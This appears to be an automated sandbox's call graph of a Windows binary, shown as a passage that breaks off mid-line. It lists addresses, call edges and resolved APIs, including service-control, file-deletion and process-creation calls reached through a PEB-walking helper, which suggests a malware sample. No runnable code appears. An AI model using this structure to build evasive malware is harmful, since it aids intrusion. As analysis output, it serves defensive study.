2717d2 GetPEB 3895->3899 3896->3891 3897->3897 3900 2746df 3899->3900 3902 2717d2 GetPEB 3900->3902 3901->3891 3903 2746f2 3902->3903 3903->3827 4281 271919 3904->4281 3906 27f5d9 GetPEB RtlAllocateHeap 3907 27857d 3906->3907 3907->3906 3908 26cca2 GetPEB 3907->3908 3909 2785ac 3907->3909 3910 2786e9 3907->3910 3912 278eb3 GetPEB 3907->3912 3913 26d467 GetPEB 3907->3913 3915 27f94b GetPEB 3907->3915 3908->3907 3911 264b40 2 API calls 3909->3911 3910->3910 3914 2785cb 3911->3914 3912->3907 3913->3907 3914->3827 3915->3907 3920 27d360 3916->3920 3917 266e01 2 API calls 3917->3920 3919 27ed7b 2 API calls 3919->3920 3920->3917 3920->3919 3921 268e38 2 API calls 3920->3921 3922 27d3ab 3920->3922 3924 27d3be 3920->3924 4284 28267c 3920->4284 3921->3920 3923 27ed7b 2 API calls 3922->3923 3923->3924 3924->3827 3932 27fee5 3925->3932 3927 27f5d9 GetPEB RtlAllocateHeap 3927->3932 3929 263466 2 API calls 3929->3932 3930 280568 3930->3827 3931 26d467 GetPEB 3931->3932 3932->3927 3932->3929 3932->3930 3932->3931 3933 27f94b GetPEB 3932->3933 4288 274e54 3932->4288 4298 28224c 3932->4298 3933->3932 3935 26303a 2 API calls 3934->3935 3936 271b14 3935->3936 3936->3827 3946 27ef01 3937->3946 3940 2725cd GetPEB 3940->3946 3942 27f5b4 3942->3827 3943 2717d2 GetPEB 3943->3946 3946->3940 3946->3942 3946->3943 4306 271b29 3946->4306 4318 27e168 3946->4318 4329 27519c 3946->4329 4347 27bd63 3946->4347 4364 272b1f 3946->4364 3948 2679e8 3947->3948 3949 267f78 GetPEB 3948->3949 3950 267a5b 3949->3950 3950->3827 3954 278c0a 3951->3954 3952 27f5d9 2 API calls 3952->3954 3953 278cc1 4525 277098 3953->4525 3954->3952 3954->3953 3956 278eb3 GetPEB 3954->3956 3957 278cbf 3954->3957 3959 27f94b GetPEB 3954->3959 4521 262263 3954->4521 3956->3954 3957->3827 3959->3954 3961 280a22 3960->3961 3966 26303a 2 API calls 3961->3966 3967 280ddc 3961->3967 4549 261a5f 3961->4549 4557 26aebb 3961->4557 4580 26d4bc 3961->4580 4600 276e97 3961->4600 4607 279a0c 3961->4607 4619 26c151 3961->4619 4627 26958a 3961->4627 3966->3961 3967->3827 3974 27952d 3971->3974 3972 26cca2 GetPEB 3972->3974 3973 27960e 3973->3827 3974->3972 3974->3973 3977 27fbc6 3975->3977 3976 27fc88 3976->3827 3977->3976 4740 26d3bf 3977->4740 4744 26c0ba 3977->4744 3982 26ac19 3980->3982 3985 26adad 3982->3985 3988 2717d2 GetPEB 3982->3988 4748 280de9 3982->4748 4752 272657 3982->4752 4756 2622f7 3982->4756 4763 273e11 3982->4763 4766 267c7a 3982->4766 3985->3827 3988->3982 3990 271919 GetPEB 3989->3990 3991 2827a3 3990->3991 4774 27ee14 3991->4774 3996 2821ad 3994->3996 3995 282212 3998 270231 GetPEB 3995->3998 3996->3995 3999 282210 3996->3999 4000 26303a 2 API calls 3996->4000 4778 276d6b 3996->4778 3998->3999 3999->3827 4000->3996 4002 268f94 4001->4002 4003 268f9c 4002->4003 4004 26303a 2 API calls 4002->4004 4006 268fb3 4002->4006 4782 263f5a 4003->4782 4004->4002 4006->3827 4010 27dc82 4007->4010 4009 27f5d9 GetPEB RtlAllocateHeap 4009->4010 4010->4009 4011 270184 GetPEB 4010->4011 4012 26d467 GetPEB 4010->4012 4013 27df19 4010->4013 4015 27f94b GetPEB 4010->4015 4017 263466 2 API calls 4010->4017 4815 263e99 4010->4815 4819 277a67 4010->4819 4823 273cbe 4010->4823 4011->4010 4012->4010 4013->3827 4015->4010 4017->4010 4019 26ae46 4018->4019 4020 267f78 GetPEB 4019->4020 4021 26aeaf 4020->4021 4021->3827 4024 276226 4022->4024 4026 262263 GetPEB 4024->4026 4027 276266 4024->4027 4827 26ca3c 4024->4827 4830 277b9e 4024->4830 4026->4024 4027->3827 4029 2679cc GetPEB 4028->4029 4030 27277c 4029->4030 4030->3827 4034 26e68a 4031->4034 4032 26eb20 4033 264e8f GetPEB 4032->4033 4036 26eb1e 4033->4036 4034->4032 4035 26303a 2 API calls 4034->4035 4034->4036 4037 264e8f GetPEB 4034->4037 4035->4034 4036->3827 4037->4034 4046 27324b 4038->4046 4040 27343d 4042 2717d2 GetPEB 4040->4042 4044 27343b 4042->4044 4043 26303a 2 API calls 4043->4046 4044->3827 4046->4040 4046->4043 4046->4044 4868 27e5ed 4046->4868 4878 278cf2 4046->4878 4882 26bdeb 4046->4882 4057 26d14d 4047->4057 4048 27f5d9 2 API calls 4048->4057 4050 26d27f 4051 262263 GetPEB 4050->4051 4053 26d297 4051->4053 4052 278eb3 GetPEB 4052->4057 4991 2635b1 4053->4991 4055 27f94b GetPEB 4055->4057 4057->4048 4057->4050 4057->4052 4057->4055 4058 26d27d 4057->4058 4059 27d15e 4 API calls 4057->4059 4060 264b40 2 API calls 4057->4060 4975 281a0a 4057->4975 4982 26c4e5 4057->4982 4058->3820 4059->4057 4060->4057 4062 2791ec 4061->4062 4081 267f78 4062->4081 4066 2702ee 4065->4066 4067 267f78 GetPEB 4066->4067 4068 270380 CloseHandle 4067->4068 4068->3840 4070 27a53c 4069->4070 4071 267f78 GetPEB 4070->4071 4072 27a5d0 CreateFileW 4071->4072 4072->3840 4074 28058d 4073->4074 4111 2797b1 4074->4111 4078 282558 4077->4078 4079 267f78 GetPEB 4078->4079 4080 2825c5 4079->4080 4080->3840 4082 268032 4081->4082 4083 268055 4081->4083 4087 26806b 4082->4087 4083->3840 4085 268040 4090 2766c8 4085->4090 4094 2632ac GetPEB 4087->4094 4089 26812d 4089->4085 4092 2766ed 4090->4092 4091 27680d 4091->4083 4092->4091 4095 26bb14 4092->4095 4094->4089 4096 26bce5 4095->4096 4103 27a5eb 4096->4103 4099 26bd2c 4101 26bd62 4099->4101 4102 2766c8 GetPEB 4099->4102 4101->4091 4102->4101 4104 27a602 4103->4104 4105 267f78 GetPEB 4104->4105 4106 26bd0c 4105->4106 4106->4099 4107 2631ea 4106->4107 4108 263200 4107->4108 4109 267f78 GetPEB 4108->4109 4110 2632a0 4109->4110 4110->4099 4112 2797d5 4111->4112 4113 267f78 GetPEB 4112->4113 4114 279852 4113->4114 4114->3840 4116 26348b 4115->4116 4117 267f78 GetPEB 4116->4117 4118 2634f4 SHGetFolderPathW 4117->4118 4118->3849 4120 266e19 4119->4120 4121 267f78 GetPEB 4120->4121 4122 266ea5 OpenSCManagerW 4121->4122 4122->3849 4124 27ed91 4123->4124 4125 267f78 GetPEB 4124->4125 4126 27ee09 CloseServiceHandle 4125->4126 4126->3849 4139 27345b 4127->4139 4131 263122 4131->3849 4138 2678e4 4132->4138 4134 26799d 4150 2691f2 4134->4150 4135 280575 GetPEB 4135->4138 4137 26799b 4137->3849 4138->4134 4138->4135 4138->4137 4146 270184 4138->4146 4140 267f78 GetPEB 4139->4140 4141 26310a 4140->4141 4142 263506 4141->4142 4143 263522 4142->4143 4144 267f78 GetPEB 4143->4144 4145 26359f RtlAllocateHeap 4144->4145 4145->4131 4147 27019a 4146->4147 4148 267f78 GetPEB 4147->4148 4149 270225 4148->4149 4149->4138 4151 26920b 4150->4151 4152 267f78 GetPEB 4151->4152 4153 269282 4152->4153 4153->4137 4163 263678 4154->4163 4156 2717d2 GetPEB 4156->4163 4157 26303a GetPEB RtlAllocateHeap 4157->4163 4159 263df0 4159->3865 4162 27ed7b 2 API calls 4162->4163 4163->4156 4163->4157 4163->4159 4163->4162 4181 26cd1c 4163->4181 4185 27640e 4163->4185 4189 268e38 4163->4189 4193 2632b3 4163->4193 4197 26cca2 4163->4197 4166 2798a4 4165->4166 4167 267f78 GetPEB 4166->4167 4168 27992e 4167->4168 4168->3865 4170 27f5f3 4169->4170 4171 26303a 2 API calls 4170->4171 4172 27f6bd 4171->4172 4172->3865 4172->4172 4174 26d492 4173->4174 4200 26adb7 4174->4200 4178 27f960 4177->4178 4203 2717d2 4178->4203 4182 26cd46 4181->4182 4183 267f78 GetPEB 4182->4183 4184 26cdc8 4183->4184 4184->4163 4186 276424 4185->4186 4187 267f78 GetPEB 4186->4187 4188 2764bd 4187->4188 4188->4163 4190 268e54 4189->4190 4191 267f78 GetPEB 4190->4191 4192 268ed4 OpenServiceW 4191->4192 4192->4163 4194 2632ec 4193->4194 4195 267f78 GetPEB 4194->4195 4196 263397 4195->4196 4196->4163 4198 267f78 GetPEB 4197->4198 4199 26cd13 4198->4199 4199->4163 4201 267f78 GetPEB 4200->4201 4202 26ae2c 4201->4202 4202->3865 4204 2717e2 4203->4204 4205 27345b GetPEB 4204->4205 4206 2718fd 4205->4206 4209 266f64 4206->4209 4210 266f81 4209->4210 4211 267f78 GetPEB 4210->4211 4212 267002 4211->4212 4212->3865 4214 27ead4 4213->4214 4215 267f78 GetPEB 4214->4215 4216 27eb4e SetFileInformationByHandle 4215->4216 4216->3877 4218 278ed5 4217->4218 4219 26adb7 GetPEB 4218->4219 4220 278ef0 4219->4220 4220->3877 4222 264b5a 4221->4222 4245 2725cd 4222->4245 4225 2725cd GetPEB 4226 264dff 4225->4226 4227 2725cd GetPEB 4226->4227 4228 264e15 4227->4228 4229 2691f2 GetPEB 4228->4229 4230 264e30 4229->4230 4231 2691f2 GetPEB 4230->4231 4232 264e4c 4231->4232 4249 277da0 4232->4249 4234 264e81 4234->3884 4236 269003 4235->4236 4237 27f5d9 2 API calls 4236->4237 4238 2691a5 4237->4238 4261 281c9b 4238->4261 4241 27f94b GetPEB 4242 2691d7 4241->4242 4265 267bc6 4242->4265 4244 2691e9 4244->3885 4246 2725e3 4245->4246 4253 26218f 4246->4253 4250 277db3 4249->4250 4251 267f78 GetPEB 4250->4251 4252 277e32 SHFileOperationW 4251->4252 4252->4234 4254 2621a7 4253->4254 4257 267b24 4254->4257 4258 267b3c 4257->4258 4259 267f78 GetPEB 4258->4259 4260 26221a 4259->4260 4260->4225 4262 281cba 4261->4262 4263 26adb7 GetPEB 4262->4263 4264 2691c4 4263->4264 4264->4241 4266 267bd6 4265->4266 4267 267f78 GetPEB 4266->4267 4268 267c6e DeleteFileW 4267->4268 4268->4244 4270 26d2ee 4269->4270 4271 267f78 GetPEB 4270->4271 4272 26d34d 4271->4272 4272->3891 4274 2692b3 4273->4274 4275 267f78 GetPEB 4274->4275 4276 26932f 4275->4276 4276->3891 4278 272532 4277->4278 4279 267f78 GetPEB 4278->4279 4280 27259c 4279->4280 4280->3891 4282 267f78 GetPEB 4281->4282 4283 2719a8 4282->4283 4283->3907 4285 28268c 4284->4285 4286 267f78 GetPEB 4285->4286 4287 2826f0 4286->4287 4287->3920 4289 274e7d 4288->4289 4290 2725cd GetPEB 4289->4290 4291 27504f 4290->4291 4302 26816b 4291->4302 4293 27508e 4294 2702d8 2 API calls 4293->4294 4297 275099 4293->4297 4295 2750b6 4294->4295 4296 2702d8 2 API calls 4295->4296 4296->4297 4297->3932 4299 282274 4298->4299 4300 26adb7 GetPEB 4299->4300 4301 282299 4300->4301 4301->3932 4303 2681a6 4302->4303 4304 267f78 GetPEB 4303->4304 4305 268221 CreateProcessW 4304->4305 4305->4293 4317 271b59 4306->4317 4307 2723a5 4310 2717d2 GetPEB 4307->4310 4308 26303a 2 API calls 4308->4317 4309 2717d2 GetPEB 4309->4317 4313 2723a3 4310->4313 4313->3946 4317->4307 4317->4308 4317->4309 4317->4313 4373 277730 4317->4373 4380 27af0b 4317->4380 4395 276845 4317->4395 4399 27fd42 4317->4399 4403 27490e 4317->4403 4326 27e468 4318->4326 4320 27f5d9 2 API calls 4320->4326 4321 27e4a9 4325 2717d2 GetPEB 4321->4325 4322 26adb7 GetPEB 4322->4326 4323 26303a 2 API calls 4323->4326 4324 27e5e8 4324->4324 4327 27e4b7 4325->4327 4326->4320 4326->4321 4326->4322 4326->4323 4326->4324 4328 27f94b GetPEB 4326->4328 4438 277e3d 4326->4438 4327->3946 4328->4326 4346 275be0 4329->4346 4330 26303a GetPEB RtlAllocateHeap 4330->4346 4331 27fd42 GetPEB 4331->4346 4332 27600d 4334 2717d2 GetPEB 4332->4334 4333 26e4f5 2 API calls 4333->4346 4336 275e22 4334->4336 4335 275db1 4449 26e4f5 4335->4449 4336->3946 4338 27f5d9 2 API calls 4338->4346 4340 275dc6 4453 26ec15 4340->4453 4341 26adb7 GetPEB 4341->4346 4343 27f94b GetPEB 4343->4346 4345 27f94b GetPEB 4345->4336 4346->4330 4346->4331 4346->4332 4346->4333 4346->4335 4346->4338 4346->4341 4346->4343 4457 26d360 4346->4457 4363 27bdce 4347->4363 4348 27ece4 GetPEB 4348->4363 4350 27f5d9 2 API calls 4350->4363 4353 27ced6 4493 27ece4 4353->4493 4355 2717d2 GetPEB 4355->4363 4358 27ceef 4358->3946 4360 27f94b GetPEB 4360->4363 4361 276561 GetPEB 4361->4363 4363->4348 4363->4350 4363->4353 4363->4355 4363->4358 4363->4360 4363->4361 4461 263129 4363->4461 4465 273d5b 4363->4465 4469 268d7e 4363->4469 4473 266d15 4363->4473 4476 2735a3 4363->4476 4485 26cafe 4363->4485 4489 27038b 4363->4489 4366 272b47 4364->4366 4367 272f8c 4366->4367 4368 272f8a 4366->4368 4370 26303a 2 API calls 4366->4370 4372 27fd42 GetPEB 4366->4372 4505 27a916 4366->4505 4512 27df2b 4366->4512 4369 2717d2 GetPEB 4367->4369 4368->3946 4369->4368 4370->4366 4372->4366 4374 27775f 4373->4374 4375 277a3f 4374->4375 4377 277a3d 4374->4377 4379 26303a 2 API calls 4374->4379 4410 264e8f 4374->4410 4376 264e8f GetPEB 4375->4376 4376->4377 4377->4317 4379->4374 4394 27af45 4380->4394 4381 27bd34 4382 272519 GetPEB 4381->4382 4384 27bd32 4382->4384 4383 26303a 2 API calls 4383->4394 4384->4317 4388 27f5d9 GetPEB RtlAllocateHeap 4388->4394 4391 2717d2 GetPEB 4391->4394 4392 26d2c9 GetPEB 4392->4394 4393 27f94b GetPEB 4393->4394 4394->4381 4394->4383 4394->4384 4394->4388 4394->4391 4394->4392 4394->4393 4414 27fe12 4394->4414 4418 27ceff 4394->4418 4422 26500a 4394->4422 4426 264f68 4394->4426 4430 26eb4b 4394->4430 4396 276858 4395->4396 4397 27fd42 GetPEB 4396->4397 4398 2768c1 4397->4398 4398->4317 4400 27fd60 4399->4400 4434 276ca3 4400->4434 4404 274930 4403->4404 4405 26303a 2 API calls 4404->4405 4406 274e35 4404->4406 4408 274e1e 4404->4408 4409 2750d4 GetPEB 4404->4409 4405->4404 4407 2717d2 GetPEB 4406->4407 4407->4408 4408->4317 4409->4404 4411 264ea8 4410->4411 4412 27fd42 GetPEB 4411->4412 4413 264f5a 4412->4413 4413->4374 4415 27fe31 4414->4415 4416 267f78 GetPEB 4415->4416 4417 27feb7 4416->4417 4417->4394 4419 27cf1e 4418->4419 4420 267f78 GetPEB 4419->4420 4421 27cf8b 4420->4421 4421->4394 4423 26503a 4422->4423 4424 267f78 GetPEB 4423->4424 4425 2650b4 4424->4425 4425->4394 4427 264f81 4426->4427 4428 267f78 GetPEB 4427->4428 4429 264fff 4428->4429 4429->4394 4431 26eb77 4430->4431 4432 267f78 GetPEB 4431->4432 4433 26ebfc 4432->4433 4433->4394 4435 276cc5 4434->4435 4436 267f78 GetPEB 4435->4436 4437 276d2a 4436->4437 4437->4317 4439 277e55 4438->4439 4440 2780fc 4439->4440 4442 2780fa 4439->4442 4444 26303a 2 API calls 4439->4444 4445 281ce8 4439->4445 4443 281ce8 GetPEB 4440->4443 4442->4326 4443->4442 4444->4439 4446 281d0e 4445->4446 4447 267f78 GetPEB 4446->4447 4448 281d89 4447->4448 4448->4439 4450 26e508 4449->4450 4451 26303a 2 API calls 4450->4451 4452 26e5ee 4451->4452 4452->4340 4452->4452 4454 26ec31 4453->4454 4455 26adb7 GetPEB 4454->4455 4456 26ec4c 4455->4456 4456->4345 4458 26d385 4457->4458 4459 26adb7 GetPEB 4458->4459 4460 26d3a2 4459->4460 4460->4346 4462 263150 4461->4462 4463 267f78 GetPEB 4462->4463 4464 2631d5 4463->4464 4464->4363 4466 273d7e 4465->4466 4467 267f78 GetPEB 4466->4467 4468 273e01 4467->4468 4468->4363 4470 268db1 4469->4470 4471 267f78 GetPEB 4470->4471 4472 268e1f 4471->4472 4472->4363 4497 276361 4473->4497 4477 273831 4476->4477 4478 27394d 4477->4478 4482 26303a GetPEB RtlAllocateHeap 4477->4482 4483 27fd42 GetPEB 4477->4483 4484 2717d2 GetPEB 4477->4484 4501 2719b1 4477->4501 4480 273955 4478->4480 4481 2717d2 GetPEB 4478->4481 4480->4363 4481->4480 4482->4477 4483->4477 4484->4477 4486 26cb2d 4485->4486 4487 267f78 GetPEB 4486->4487 4488 26cba6 4487->4488 4488->4363 4490 2703ad 4489->4490 4491 267f78 GetPEB 4490->4491 4492 27041d 4491->4492 4492->4363 4494 27ecfa 4493->4494 4495 267f78 GetPEB 4494->4495 4496 27ed6b 4495->4496 4496->4358 4498 276388 4497->4498 4499 267f78 GetPEB 4498->4499 4500 266dcb 4499->4500 4500->4363 4502 2719d4 4501->4502 4503 267f78 GetPEB 4502->4503 4504 271a6e 4503->4504 4504->4477 4506 27a945 4505->4506 4507 280908 GetPEB 4506->4507 4508 27aed1 4506->4508 4510 27aecf 4506->4510 4511 26303a 2 API calls 4506->4511 4507->4506 4509 2717d2 GetPEB 4508->4509 4509->4510 4510->4366 4511->4506 4514 27df4c 4512->4514 4515 27af0b 2 API calls 4514->4515 4516 27e15e 4514->4516 4517 26a762 4514->4517 4515->4514 4516->4366 4518 26a791 4517->4518 4519 267f78 GetPEB 4518->4519 4520 26a812 4519->4520 4520->4514 4522 262279 4521->4522 4523 267f78 GetPEB 4522->4523 4524 2622ec 4523->4524 4524->3954 4529 2770c6 4525->4529 4526 277715 4526->3957 4527 277717 4545 266eb4 4527->4545 4529->4526 4529->4527 4532 27f5d9 GetPEB RtlAllocateHeap 4529->4532 4533 281c9b GetPEB 4529->4533 4534 27f94b GetPEB 4529->4534 4535 278eb3 GetPEB 4529->4535 4536 277098 2 API calls 4529->4536 4537 2827c2 4529->4537 4541 26ec5d 4529->4541 4532->4529 4533->4529 4534->4529 4535->4529 4536->4529 4538 2827db 4537->4538 4539 267f78 GetPEB 4538->4539 4540 28284c 4539->4540 4540->4529 4542 26ec73 4541->4542 4543 267f78 GetPEB 4542->4543 4544 26ecfc 4543->4544 4544->4529 4546 266eca 4545->4546 4547 267f78 GetPEB 4546->4547 4548 266f59 4547->4548 4548->4526 4555 261cb1 4549->4555 4551 261daf 4551->3961 4552 261db1 4655 281be6 4552->4655 4555->4551 4555->4552 4638 273e89 4555->4638 4646 267013 4555->4646 4651 270231 4555->4651 4577 26b6c5 4557->4577 4558 2826fc GetPEB 4558->4577 4560 26b9cb 4561 2702d8 2 API calls 4560->4561 4564 26b948 4561->4564 4563 26b94d 4565 274e54 3 API calls 4563->4565 4564->3961 4567 26b983 4565->4567 4566 280575 GetPEB 4566->4577 4567->4564 4570 2702d8 2 API calls 4567->4570 4568 2702d8 GetPEB CloseHandle 4568->4577 4569 262263 GetPEB 4569->4577 4572 26b9a8 4570->4572 4574 2702d8 2 API calls 4572->4574 4574->4564 4575 27f5d9 2 API calls 4575->4577 4576 278eb3 GetPEB 4576->4577 4577->4558 4577->4560 4577->4563 4577->4564 4577->4566 4577->4568 4577->4569 4577->4575 4577->4576 4578 27f94b GetPEB 4577->4578 4671 273983 4577->4671 4679 279054 4577->4679 4683 2805f6 4577->4683 4690 2671e3 4577->4690 4700 28131d 4577->4700 4578->4577 4727 268ce7 4580->4727 4582 2702d8 2 API calls 4599 26e08b 4582->4599 4583 277e3d 2 API calls 4583->4599 4584 274e54 3 API calls 4584->4599 4585 263466 2 API calls 4585->4599 4586 2717d2 GetPEB 4586->4599 4587 26e4cd 4587->3961 4589 270184 GetPEB 4589->4599 4590 280575 GetPEB 4590->4599 4591 26d467 GetPEB 4591->4599 4593 262263 GetPEB 4593->4599 4594 279054 GetPEB 4594->4599 4595 27f5d9 GetPEB RtlAllocateHeap 4595->4599 4596 278eb3 GetPEB 4596->4599 4597 27f94b GetPEB 4597->4599 4598 2805f6 3 API calls 4598->4599 4599->4582 4599->4583 4599->4584 4599->4585 4599->4586 4599->4587 4599->4589 4599->4590 4599->4591 4599->4593 4599->4594 4599->4595 4599->4596 4599->4597 4599->4598 4730 26a4de 4599->4730 4736 2768c8 4599->4736 4604 27701b 4600->4604 4601 27708b 4601->3961 4602 2717d2 GetPEB 4602->4604 4603 2679cc GetPEB 4603->4604 4604->4601 4604->4602 4604->4603 4605 281be6 GetPEB 4604->4605 4606 2702d8 2 API calls 4604->4606 4605->4604 4606->4604 4618 27a151 4607->4618 4608 263466 2 API calls 4608->4618 4609 27a36e 4609->3961 4610 280575 GetPEB 4610->4618 4611 262263 GetPEB 4611->4618 4612 279054 GetPEB 4612->4618 4613 27f5d9 GetPEB RtlAllocateHeap 4613->4618 4614 274e54 3 API calls 4614->4618 4615 278eb3 GetPEB 4615->4618 4616 27f94b GetPEB 4616->4618 4617 2805f6 3 API calls 4617->4618 4618->4608 4618->4609 4618->4610 4618->4611 4618->4612 4618->4613 4618->4614 4618->4615 4618->4616 4618->4617 4625 26c3cc 4619->4625 4620 270231 GetPEB 4620->4625 4621 273e89 GetPEB 4621->4625 4622 26c4ca 4622->3961 4623 26c4cc 4624 281be6 GetPEB 4623->4624 4624->4622 4625->4620 4625->4621 4625->4622 4625->4623 4626 267013 GetPEB 4625->4626 4626->4625 4633 26999b 4627->4633 4628 274e54 3 API calls 4628->4633 4629 269aed 4629->3961 4630 280575 GetPEB 4630->4633 4631 262263 GetPEB 4631->4633 4632 279054 GetPEB 4632->4633 4633->4628 4633->4629 4633->4630 4633->4631 4633->4632 4634 27f5d9 2 API calls 4633->4634 4635 278eb3 GetPEB 4633->4635 4636 27f94b GetPEB 4633->4636 4637 2805f6 3 API calls 4633->4637 4634->4633 4635->4633 4636->4633 4637->4633 4639 273ea4 4638->4639 4640 274164 4639->4640 4659 26427c 4639->4659 4640->4555 4643 27fd42 GetPEB 4644 27411b 4643->4644 4644->4640 4645 27fd42 GetPEB 4644->4645 4645->4644 4649 26702a 4646->4649 4647 2671d4 4647->4555 4648 2631ea GetPEB 4648->4649 4649->4647 4649->4648 4663 281da1 4649->4663 4652 270256 4651->4652 4653 267f78 GetPEB 4652->4653 4654 2702c5 4653->4654 4654->4555 4656 281bf9 4655->4656 4667 27a873 4656->4667 4660 26429a 4659->4660 4661 267f78 GetPEB 4660->4661 4662 2642ff 4661->4662 4662->4640 4662->4643 4664 281dba 4663->4664 4665 267f78 GetPEB 4664->4665 4666 281e3b 4665->4666 4666->4649 4668 27a88e 4667->4668 4669 267f78 GetPEB 4668->4669 4670 27a906 4669->4670 4670->4551 4674 2739a7 4671->4674 4673 28131d GetPEB 4673->4674 4674->4673 4676 273b7f 4674->4676 4677 273b6a 4674->4677 4703 26cbbf 4674->4703 4707 27ec35 4674->4707 4676->4577 4678 2702d8 2 API calls 4677->4678 4678->4676 4680 27906e 4679->4680 4681 26cca2 GetPEB 4680->4681 4682 279163 4681->4682 4682->4577 4686 280618 4683->4686 4684 27a50a 2 API calls 4684->4686 4685 280876 4685->4577 4686->4684 4686->4685 4687 280863 4686->4687 4711 267e8a 4686->4711 4689 2702d8 2 API calls 4687->4689 4689->4685 4697 267223 4690->4697 4691 2725cd GetPEB 4691->4697 4693 26773f 4723 278e1d 4693->4723 4695 27f5d9 2 API calls 4695->4697 4696 26773d 4696->4577 4697->4691 4697->4693 4697->4695 4697->4696 4699 27f94b GetPEB 4697->4699 4715 2822f2 4697->4715 4719 2723c7 4697->4719 4699->4697 4701 267f78 GetPEB 4700->4701 4702 28139a 4701->4702 4702->4577 4704 26cbeb 4703->4704 4705 267f78 GetPEB 4704->4705 4706 26cc88 4705->4706 4706->4674 4708 27ec4c 4707->4708 4709 267f78 GetPEB 4708->4709 4710 27ecd5 4709->4710 4710->4674 4712 267eb1 4711->4712 4713 267f78 GetPEB 4712->4713 4714 267f13 4713->4714 4714->4686 4716 282310 4715->4716 4717 267f78 GetPEB 4716->4717 4718 2823a9 4717->4718 4718->4697 4720 272408 4719->4720 4721 267f78 GetPEB 4720->4721 4722 27247e 4721->4722 4722->4697 4724 278e30 4723->4724 4725 267f78 GetPEB 4724->4725 4726 278ea8 4725->4726 4726->4696 4728 267f78 GetPEB 4727->4728 4729 268d75 4728->4729 4729->4599 4731 26a504 4730->4731 4732 26a73d 4731->4732 4733 26303a 2 API calls 4731->4733 4734 26a73b 4731->4734 4735 264e8f GetPEB 4732->4735 4733->4731 4734->4599 4735->4734 4737 2768f7 4736->4737 4738 267f78 GetPEB 4737->4738 4739 27697d 4738->4739 4739->4599 4741 26d3d5 4740->4741 4742 267f78 GetPEB 4741->4742 4743 26d45b 4742->4743 4743->3977 4745 26c0ca 4744->4745 4746 267f78 GetPEB 4745->4746 4747 26c145 4746->4747 4747->3977 4749 280e0b 4748->4749 4750 267f78 GetPEB 4749->4750 4751 280e6a 4750->4751 4751->3982 4753 27266d 4752->4753 4754 267f78 GetPEB 4753->4754 4755 2726e4 4754->4755 4755->3982 4757 262312 4756->4757 4758 270430 GetPEB 4757->4758 4759 26303a 2 API calls 4757->4759 4760 2625ce 4757->4760 4761 262606 4757->4761 4758->4757 4759->4757 4770 270430 4760->4770 4761->3982 4764 267f78 GetPEB 4763->4764 4765 273e80 4764->4765 4765->3982 4767 267c8d 4766->4767 4768 267f78 GetPEB 4767->4768 4769 267cf8 4768->4769 4769->3982 4771 270463 4770->4771 4772 267f78 GetPEB 4771->4772 4773 2704eb 4772->4773 4773->4761 4775 27ee30 4774->4775 4776 267f78 GetPEB 4775->4776 4777 27eeb4 4776->4777 4777->3827 4779 276d86 4778->4779 4780 267f78 GetPEB 4779->4780 4781 276e0c 4780->4781 4781->3996 4783 263f7b 4782->4783 4785 26419a 4783->4785 4786 2641f2 4783->4786 4803 263dfb 4783->4803 4787 26e4f5 2 API calls 4785->4787 4786->4006 4788 2641ac 4787->4788 4794 273094 4788->4794 4793 27f94b GetPEB 4793->4786 4807 273c24 4794->4807 4798 2641b8 4799 267f31 4798->4799 4800 267f56 4799->4800 4801 26adb7 GetPEB 4800->4801 4802 2641db 4801->4802 4802->4793 4804 263e15 4803->4804 4805 267f78 GetPEB 4804->4805 4806 263e89 4805->4806 4806->4783 4808 273c40 4807->4808 4809 267f78 GetPEB 4808->4809 4810 2731d0 4809->4810 4810->4798 4811 27660b 4810->4811 4812 276638 4811->4812 4813 267f78 GetPEB 4812->4813 4814 2766b2 4813->4814 4814->4798 4816 263ed1 4815->4816 4817 267f78 GetPEB 4816->4817 4818 263f40 4817->4818 4818->4010 4820 277a94 4819->4820 4821 267f78 GetPEB 4820->4821 4822 277b0d 4821->4822 4822->4010 4824 273cd4 4823->4824 4825 267f78 GetPEB 4824->4825 4826 273d50 4825->4826 4826->4010 4838 2786ee 4827->4838 4831 277bbf 4830->4831 4861 26bd6b 4831->4861 4834 277d95 4834->4024 4837 2702d8 2 API calls 4837->4834 4843 27871a 4838->4843 4840 278946 4842 2702d8 2 API calls 4840->4842 4844 26caf4 4842->4844 4843->4840 4843->4844 4847 26823e 4843->4847 4851 26be5e 4843->4851 4854 27fc9e 4843->4854 4858 2626a7 4843->4858 4844->4024 4848 268254 4847->4848 4849 267f78 GetPEB 4848->4849 4850 2682c4 4849->4850 4850->4843 4852 267f78 GetPEB 4851->4852 4853 26bed7 4852->4853 4853->4843 4855 27fcb7 4854->4855 4856 267f78 GetPEB 4855->4856 4857 27fd34 4856->4857 4857->4843 4859 271919 GetPEB 4858->4859 4860 2626f5 4859->4860 4860->4843 4862 267f78 GetPEB 4861->4862 4863 26bdda 4862->4863 4863->4834 4864 27f73b 4863->4864 4865 27f75d 4864->4865 4866 267f78 GetPEB 4865->4866 4867 277d83 4866->4867 4867->4837 4875 27e8c1 4868->4875 4869 27ea86 4871 2717d2 GetPEB 4869->4871 4870 26303a 2 API calls 4870->4875 4872 27ea97 4871->4872 4872->4046 4874 27f5d9 2 API calls 4874->4875 4875->4869 4875->4870 4875->4872 4875->4874 4876 28224c GetPEB 4875->4876 4877 27f94b GetPEB 4875->4877 4886 278ef8 4875->4886 4876->4875 4877->4875 4879 278d46 4878->4879 4880 278d5c 4878->4880 4879->4880 4881 2717d2 GetPEB 4879->4881 4880->4046 4881->4879 4883 26be04 4882->4883 4890 267d03 4883->4890 4887 278f15 4886->4887 4888 26303a 2 API calls 4887->4888 4889 279000 4888->4889 4889->4875 4889->4889 4892 267d1b 4890->4892 4894 267e67 4892->4894 4896 267e65 4892->4896 4898 26303a 2 API calls 4892->4898 4899 270503 4892->4899 4915 278d61 4892->4915 4920 262710 4892->4920 4897 2717d2 GetPEB 4894->4897 4896->4046 4897->4896 4898->4892 4913 2712cb 4899->4913 4901 272519 GetPEB 4901->4913 4906 2717c5 4906->4892 4907 27a379 GetPEB 4907->4913 4909 27f5d9 GetPEB RtlAllocateHeap 4909->4913 4910 27fd42 GetPEB 4910->4913 4912 26d2c9 GetPEB 4912->4913 4913->4901 4913->4906 4913->4907 4913->4909 4913->4910 4913->4912 4914 27f94b GetPEB 4913->4914 4929 26866c 4913->4929 4933 2764cf 4913->4933 4937 26ed0a 4913->4937 4951 26c98b 4913->4951 4955 27970d 4913->4955 4959 26a838 4913->4959 4963 26c01c 4913->4963 4914->4913 4916 2764cf GetPEB 4915->4916 4917 278e04 4916->4917 4918 2717d2 GetPEB 4917->4918 4919 278e16 4918->4919 4919->4892 4921 262d16 4920->4921 4922 262edc 4921->4922 